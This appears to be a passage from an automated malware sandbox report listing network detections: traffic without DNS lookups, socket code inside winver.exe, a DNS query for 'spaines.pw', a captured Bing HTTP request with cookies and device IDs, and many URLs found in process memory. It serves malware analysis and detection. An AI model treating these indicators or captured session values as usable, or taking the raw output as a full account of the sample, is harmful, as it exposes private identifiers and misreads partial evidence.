            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03392F88 send,send,recv,closesocket,2_2_03392F88
            Source: unknownDNS traffic detected: queries for: spaines.pw
            Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2237Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000B.00000000.1755006893.000002433B7BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: explorer.exe, 00000003.00000002.3045067363.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1635099926.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3023688229.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2963352033.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: svchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000B.00000000.1771194064.0000024B423E8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1755590053.0000024340029000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000002.2944847017.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1632391026.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1633247183.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3031801494.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000003.00000002.3031801494.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000000.1718218734.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2947061368.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
            Source: SearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcc.loki.delve.office.com/api
            Source: SearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/
            Source: svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
            Source: SearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msit.loki.delve.office.com/apiQ
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2911384205.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728745445.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1805286472.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWriteK
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1766436902.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
            Source: SearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
            Source: SearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.3059382822.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1638855988.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
